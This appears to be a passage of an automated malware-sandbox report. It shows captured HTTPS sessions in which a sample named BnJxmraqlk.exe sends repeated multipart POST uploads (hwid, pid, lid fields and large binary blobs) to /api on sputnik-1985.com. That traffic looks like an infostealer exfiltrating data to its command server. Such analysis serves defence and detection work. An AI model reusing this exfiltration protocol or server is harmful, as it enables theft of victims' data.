                                                                                                                                                                                                                          2025-01-07 12:17:05 UTC1369INData Raw: 36 7a 70 73 6f 55 70 6b 77 71 57 54 45 75 70 52 48 4e 6f 33 6a 33 38 6d 6f 6a 47 53 38 73 48 64 79 58 52 64 64 4e 62 69 45 69 2f 72 55 79 42 5a 63 6d 78 79 68 64 5a 4b 6d 70 41 70 6e 69 37 57 55 6e 4e 48 62 5a 4c 79 6b 64 33 4a 64 4c 56 30 6a 76 4c 47 65 37 4e 47 5a 55 78 47 51 4b 4f 34 71 78 4a 76 72 47 33 57 53 2b 70 43 41 72 39 56 38 6f 6f 4a 33 49 51 73 46 53 6a 61 70 6c 5a 44 78 79 65 64 64 43 63 4e 73 2f 43 44 57 39 37 52 4a 61 62 32 33 33 35 44 52 7a 52 32 69 2f 43 46 71 52 56 41 55 64 61 33 65 78 62 32 66 32 67 39 44 6b 54 32 34 63 63 4f 62 6c 53 35 67 69 50 36 50 6c 6f 61 61 5a 50 58 38 4f 47 70 46 4f 78 6f 38 75 49 57 4d 36 39 58 4a 47 68 47 6f 63 4f 35 71 78 50 33 72 50 48 57 4d 39 35 69 48 67 4e 67 44 72 62 59 77 4f 68 6f 56 56 58 58 78 33 70
                                                                                                                                                                                                                          Data Ascii: 6zpsoUpkwqWTEupRHNo3j38mojGS8sHdyXRddNbiEi/rUyBZcmxyhdZKmpApni7WUnNHbZLykd3JdLV0jvLGe7NGZUxGQKO4qxJvrG3WS+pCAr9V8ooJ3IQsFSjaplZDxyeddCcNs/CDW97RJab2335DRzR2i/CFqRVAUda3exb2f2g9DkT24ccOblS5giP6PloaaZPX8OGpFOxo8uIWM69XJGhGocO5qxP3rPHWM95iHgNgDrbYwOhoVVXXx3p
                                                                                                                                                                                                                          2025-01-07 12:17:05 UTC1369INData Raw: 45 45 54 59 4c 37 68 78 6b 71 4c 6e 41 57 65 50 39 64 2b 75 33 39 55 38 2b 2b 52 33 48 78 34 4d 56 44 4b 70 6a 39 44 64 30 39 55 65 58 5a 59 35 37 6a 7a 45 6f 2b 74 52 4a 63 79 35 6d 34 44 52 7a 58 54 70 35 32 4a 35 53 6c 49 49 4b 76 47 48 33 65 75 59 67 55 38 66 31 79 7a 75 4b 73 54 69 71 42 74 6b 68 50 71 4a 6b 74 61 72 47 72 71 78 4f 47 59 54 43 56 6f 79 72 34 69 47 73 64 44 61 42 30 75 70 41 49 56 2b 67 71 4b 78 44 6e 43 6b 32 64 2f 66 30 5a 70 6b 34 34 56 33 59 6c 30 39 46 48 57 6e 33 73 57 39 37 64 6f 54 58 35 41 6f 76 7a 2b 73 68 70 45 7a 4e 4b 37 2b 69 74 4f 6c 6b 6a 53 71 74 7a 6f 6d 58 55 77 61 4d 2f 2f 47 7a 62 4f 59 33 51 77 52 7a 32 37 38 4b 64 48 32 2f 46 6b 6b 6e 62 65 47 30 59 66 56 66 4f 6e 79 64 7a 68 64 57 68 70 79 76 49 79 50 2b 39 76
                                                                                                                                                                                                                          Data Ascii: EETYL7hxkqLnAWeP9d+u39U8++R3Hx4MVDKpj9Dd09UeXZY57jzEo+tRJcy5m4DRzXTp52J5SlIIKvGH3euYgU8f1yzuKsTiqBtkhPqJktarGrqxOGYTCVoyr4iGsdDaB0upAIV+gqKxDnCk2d/f0Zpk44V3Yl09FHWn3sW97doTX5Aovz+shpEzNK7+itOlkjSqtzomXUwaM//GzbOY3QwRz278KdH2/FkknbeG0YfVfOnydzhdWhpyvIyP+9v
                                                                                                                                                                                                                          2025-01-07 12:17:05 UTC1369INData Raw: 33 6d 67 66 34 57 6d 70 51 70 6b 6b 50 2b 63 68 35 4c 53 47 6f 57 5a 4f 69 63 59 44 46 30 4c 67 62 2b 58 37 64 58 57 47 68 4f 33 4f 62 68 78 75 70 75 63 47 48 47 53 75 37 6d 53 68 35 5a 6b 39 66 77 76 61 6b 56 43 65 7a 2b 76 6b 35 4c 36 6d 76 6b 61 52 35 52 2b 34 44 4b 41 35 66 4e 4a 55 34 2f 30 6d 70 2b 57 31 77 57 78 72 44 6f 6c 47 6b 42 36 4d 71 6d 64 33 62 4f 59 31 56 30 4a 31 7a 2b 6b 59 6f 6d 71 72 45 56 78 6d 50 37 66 33 39 47 62 5a 4f 50 38 4e 69 41 4e 44 31 55 79 38 35 69 54 38 35 6a 47 55 30 6a 58 4b 4f 34 71 31 2b 76 72 47 7a 62 61 75 64 69 53 67 34 63 69 75 4b 6f 30 62 53 4d 38 64 79 65 34 6a 70 36 2f 36 64 51 5a 52 34 49 39 76 6e 57 36 6d 34 59 62 63 5a 4c 36 33 61 43 48 6c 69 53 31 75 33 64 6b 58 52 6f 61 62 66 2b 7a 6a 2f 72 49 32 6c 30 66
                                                                                                                                                                                                                          Data Ascii: 3mgf4WmpQpkkP+ch5LSGoWZOicYDF0Lgb+X7dXWGhO3ObhxupucGHGSu7mSh5Zk9fwvakVCez+vk5L6mvkaR5R+4DKA5fNJU4/0mp+W1wWxrDolGkB6Mqmd3bOY1V0J1z+kYomqrEVxmP7f39GbZOP8NiAND1Uy85iT85jGU0jXKO4q1+vrGzbaudiSg4ciuKo0bSM8dye4jp6/6dQZR4I9vnW6m4YbcZL63aCHliS1u3dkXRoabf+zj/rI2l0f


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          3192.168.2.649722104.21.48.1443612C:\Users\user\Desktop\BnJxmraqlk.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-01-07 12:17:06 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=WW7R38ADA900WJ
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 12830
                                                                                                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                                                                                                          2025-01-07 12:17:06 UTC12830OUTData Raw: 2d 2d 57 57 37 52 33 38 41 44 41 39 30 30 57 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 33 39 46 39 43 46 43 41 46 32 39 45 32 34 41 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 57 57 37 52 33 38 41 44 41 39 30 30 57 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 57 37 52 33 38 41 44 41 39 30 30 57 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 63 51 6c 30 6d 2d 2d 0d 0a 2d 2d 57 57 37 52 33 38 41 44 41 39 30 30 57
                                                                                                                                                                                                                          Data Ascii: --WW7R38ADA900WJContent-Disposition: form-data; name="hwid"639F9CFCAF29E24A822D1F4978021086--WW7R38ADA900WJContent-Disposition: form-data; name="pid"2--WW7R38ADA900WJContent-Disposition: form-data; name="lid"hcQl0m----WW7R38ADA900W
                                                                                                                                                                                                                          2025-01-07 12:17:10 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Tue, 07 Jan 2025 12:17:10 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=jdu7s95titm5qj4q1krgm380ph; expires=Sat, 03 May 2025 06:03:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HAH5H10yK0aYiHfHdwIpUHX%2BIqC4KW4CDT4%2Ff6bsflRRKOd8elYCtSbJ5JxlmjyESODhNphPcagDX0ikBR6pvokz82%2BbzjP8InPMzSVo8iFveF5lXlmic6jF890%2B%2BrBMPRG3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8fe3e1fd89d3c323-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1442&min_rtt=1431&rtt_var=558&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13766&delivery_rate=1922317&cwnd=214&unsent_bytes=0&cid=65f2f46eb2601300&ts=4691&x=0"
                                                                                                                                                                                                                          2025-01-07 12:17:10 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                          2025-01-07 12:17:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          4192.168.2.649758104.21.48.1443612C:\Users\user\Desktop\BnJxmraqlk.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-01-07 12:17:11 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=OOG2NDWT1
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 15046
                                                                                                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                                                                                                          2025-01-07 12:17:11 UTC15046OUTData Raw: 2d 2d 4f 4f 47 32 4e 44 57 54 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 33 39 46 39 43 46 43 41 46 32 39 45 32 34 41 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 4f 4f 47 32 4e 44 57 54 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 4f 47 32 4e 44 57 54 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 63 51 6c 30 6d 2d 2d 0d 0a 2d 2d 4f 4f 47 32 4e 44 57 54 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                                                                                                                                          Data Ascii: --OOG2NDWT1Content-Disposition: form-data; name="hwid"639F9CFCAF29E24A822D1F4978021086--OOG2NDWT1Content-Disposition: form-data; name="pid"2--OOG2NDWT1Content-Disposition: form-data; name="lid"hcQl0m----OOG2NDWT1Content-Dispositi
                                                                                                                                                                                                                          2025-01-07 12:17:11 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Tue, 07 Jan 2025 12:17:11 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=28qvj86b2a8dg68p03h49o61rh; expires=Sat, 03 May 2025 06:03:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HfTudMjBGSSw87uDVaHnVMecHR1jc0nUw0zH8NS787jl8%2FIvB1ZkeAyQWkwoDV5Tob%2B6w0N%2FlznaSEvgdRmmHwyeYnAHAgAs0njIhcOw8KShAsoDVXB4ucM6dUUBxEItSbah"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8fe3e21eeb4cc461-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1534&min_rtt=1517&rtt_var=603&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2841&recv_bytes=15977&delivery_rate=1763285&cwnd=228&unsent_bytes=0&cid=c4d71bf16794cc42&ts=532&x=0"
                                                                                                                                                                                                                          2025-01-07 12:17:11 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                          2025-01-07 12:17:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          5192.168.2.649767104.21.48.1443612C:\Users\user\Desktop\BnJxmraqlk.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-01-07 12:17:12 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=12HYARPH96
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 19910
                                                                                                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                                                                                                          2025-01-07 12:17:12 UTC15331OUTData Raw: 2d 2d 31 32 48 59 41 52 50 48 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 33 39 46 39 43 46 43 41 46 32 39 45 32 34 41 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 31 32 48 59 41 52 50 48 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 31 32 48 59 41 52 50 48 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 63 51 6c 30 6d 2d 2d 0d 0a 2d 2d 31 32 48 59 41 52 50 48 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                                                                                          Data Ascii: --12HYARPH96Content-Disposition: form-data; name="hwid"639F9CFCAF29E24A822D1F4978021086--12HYARPH96Content-Disposition: form-data; name="pid"3--12HYARPH96Content-Disposition: form-data; name="lid"hcQl0m----12HYARPH96Content-Dispo
                                                                                                                                                                                                                          2025-01-07 12:17:12 UTC4579OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 02 0e 8d a5 f6
                                                                                                                                                                                                                          Data Ascii: 2+?2+?o?Mp5p_oI
                                                                                                                                                                                                                          2025-01-07 12:17:13 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Tue, 07 Jan 2025 12:17:13 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=nv4b4gvdibg2d4p3gq8u3b3qkj; expires=Sat, 03 May 2025 06:03:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5yYPyPEKeWh8No%2B5Jw54AFRgXczNmi5aGUTgKK2SCiI%2FuM5hegRxQHPk0utylyZfaaVV17FoPWQz8rlL4cNqdharF892P%2BWFvjGz5og2q7nzfMub0Yw%2BR0w4TVu%2FhKGMz8V%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8fe3e226deff43be-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1568&rtt_var=608&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2841&recv_bytes=20864&delivery_rate=1862244&cwnd=226&unsent_bytes=0&cid=d33a31939d1aa591&ts=621&x=0"
                                                                                                                                                                                                                          2025-01-07 12:17:13 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                          2025-01-07 12:17:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          6192.168.2.649783104.21.48.1443612C:\Users\user\Desktop\BnJxmraqlk.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-01-07 12:17:14 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=Z2XGBDWYJ5FRQRE
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 922
                                                                                                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                                                                                                          2025-01-07 12:17:14 UTC922OUTData Raw: 2d 2d 5a 32 58 47 42 44 57 59 4a 35 46 52 51 52 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 33 39 46 39 43 46 43 41 46 32 39 45 32 34 41 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 5a 32 58 47 42 44 57 59 4a 35 46 52 51 52 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 32 58 47 42 44 57 59 4a 35 46 52 51 52 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 63 51 6c 30 6d 2d 2d 0d 0a 2d 2d 5a 32 58 47 42 44 57 59 4a 35
                                                                                                                                                                                                                          Data Ascii: --Z2XGBDWYJ5FRQREContent-Disposition: form-data; name="hwid"639F9CFCAF29E24A822D1F4978021086--Z2XGBDWYJ5FRQREContent-Disposition: form-data; name="pid"1--Z2XGBDWYJ5FRQREContent-Disposition: form-data; name="lid"hcQl0m----Z2XGBDWYJ5
                                                                                                                                                                                                                          2025-01-07 12:17:14 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Tue, 07 Jan 2025 12:17:14 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=bbtbc7llu5jthcjtngm5tmnm01; expires=Sat, 03 May 2025 06:03:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=54dwixtPX3xAqzmCjyASfZgNLIDTmcrcCY985z%2FD51UGj5%2F5QlTcmdQhThcX8CywWhns7nDrZdHpdRnJOKq40PPYhZ93gWokZc0ddG6CY%2FkU8v33e4NmcRZtZOm%2FQqkwd%2FqQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8fe3e231dd06c323-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1465&min_rtt=1464&rtt_var=552&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1835&delivery_rate=1978319&cwnd=214&unsent_bytes=0&cid=0fed2944e9c97bd0&ts=359&x=0"
                                                                                                                                                                                                                          2025-01-07 12:17:14 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                          2025-01-07 12:17:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          7192.168.2.649792104.21.48.1443612C:\Users\user\Desktop\BnJxmraqlk.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-01-07 12:17:15 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=5G3M9VPI83U93M4I1GM
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 586875
                                                                                                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                                                                                                          2025-01-07 12:17:15 UTC15331OUTData Raw: 2d 2d 35 47 33 4d 39 56 50 49 38 33 55 39 33 4d 34 49 31 47 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 33 39 46 39 43 46 43 41 46 32 39 45 32 34 41 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 35 47 33 4d 39 56 50 49 38 33 55 39 33 4d 34 49 31 47 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 47 33 4d 39 56 50 49 38 33 55 39 33 4d 34 49 31 47 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 63 51 6c 30 6d 2d 2d 0d 0a
                                                                                                                                                                                                                          Data Ascii: --5G3M9VPI83U93M4I1GMContent-Disposition: form-data; name="hwid"639F9CFCAF29E24A822D1F4978021086--5G3M9VPI83U93M4I1GMContent-Disposition: form-data; name="pid"1--5G3M9VPI83U93M4I1GMContent-Disposition: form-data; name="lid"hcQl0m--
                                                                                                                                                                                                                          2025-01-07 12:17:15 UTC15331OUTData Raw: 97 db 8c 76 c2 0d b4 e5 af a1 2e f2 a8 66 bd 5c 3e 73 32 59 85 34 2d f9 26 f8 91 38 93 1d 33 76 8e 95 72 dd 2c 57 ac 5c d7 86 76 f6 b3 30 59 e4 34 0b 7c cf 93 29 e6 86 38 e0 b5 9a f3 9b e0 51 32 c2 14 4d 1d d8 d9 29 31 7f a5 37 23 39 e8 86 95 a2 6e 69 f3 b6 a2 f1 62 3c 71 fc aa 6b d3 36 8b 43 be a5 e4 de b0 24 58 11 52 a4 29 67 9e c2 7d b5 2e 66 57 cc 32 7f f4 b8 44 5f 6b c8 1f ce a8 6f dd 81 f5 b8 e1 c9 09 5a 31 2e fb d8 1e 90 0c 0e ce 0c e7 f1 85 38 0c b4 88 43 78 c8 d3 a2 2d 1e 7f 99 7d af 77 eb 97 16 75 ee 64 54 1e e8 c0 5c c9 37 be 07 3a 98 a0 eb 9b 78 e0 bd be 60 d5 77 cd 69 93 29 cb 32 5a df 82 16 9f 2b 78 68 3f 45 e7 b1 a4 74 a5 8e 90 d5 85 b8 45 4a 05 57 63 fb b9 76 d3 7a e6 8b 64 d2 49 f7 27 4c b1 a0 23 64 88 3e e3 65 43 2e b9 54 a4 4f ab 04 16
                                                                                                                                                                                                                          Data Ascii: v.f\>s2Y4-&83vr,W\v0Y4|)8Q2M)17#9nib<qk6C$XR)g}.fW2D_koZ1.8Cx-}wudT\7:x`wi)2Z+xh?EtEJWcvzdI'L#d>eC.TO
